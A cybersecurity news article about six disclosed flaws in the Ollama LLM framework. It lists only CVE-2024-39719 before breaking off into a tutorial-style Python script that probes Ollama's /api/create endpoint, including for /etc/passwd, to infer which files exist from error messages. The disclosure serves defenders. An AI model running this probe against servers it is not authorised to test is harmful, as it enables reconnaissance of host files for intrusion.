Critical Flaws in Ollama AI Framework Could Enable DoS, Model Theft, and Poisoning
Nov 04, 2024
Vulnerability / Cyber Threat
Cybersecurity researchers have disclosed six security flaws in the Ollama artificial intelligence (AI) framework that could be exploited by a malicious actor to perform various actions, including denial-of-service, model poisoning, and model theft.

"Collectively, the vulnerabilities could allow an attacker to carry out a wide range of malicious actions with a single HTTP request, including denial-of-service (DoS) attacks, model poisoning, model theft, and more," Oligo Security researcher Avi Lumelsky said in a report published last week.

Ollama is an open-source application that allows users to deploy and operate large language models (LLMs) locally on Windows, Linux, and macOS devices. Its project repository on GitHub has been forked 7,600 times to date.

A brief description of the six vulnerabilities is below -

CVE-2024-39719 (CVSS score: 7.5) - A vulnerability that an attacker can exploit using the /api/create endpoint to determine the existence of a file in the server
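To illustrate the kind of single-request probe described above, here is a minimal sketch of how a file-existence check against the /api/create endpoint might look. It assumes a local Ollama instance on the default port 11434; the "path" field and the exact error responses are illustrative and vary by version, so treat this as a conceptual example rather than a verified exploit.

```python
import requests  # third-party HTTP client (pip install requests)

# Hypothetical probe for the file-existence disclosure described in
# CVE-2024-39719. The endpoint URL matches Ollama's default local
# API; the request body and error strings below are assumptions.
OLLAMA_CREATE = "http://127.0.0.1:11434/api/create"

def probe_path(path: str) -> str:
    """Send a single create request referencing `path` and return the
    server's response body, whose error text can differ depending on
    whether the file exists on the server."""
    resp = requests.post(OLLAMA_CREATE, json={"name": "probe", "path": path})
    return resp.text

# Comparing the two responses can reveal whether a file is present.
print(probe_path("/etc/passwd"))      # likely present on Linux hosts
print(probe_path("/does/not/exist"))  # likely absent
```

The underlying issue is a classic error-message oracle: because the server answers differently for existing and non-existing paths, a remote caller can enumerate files without ever reading their contents.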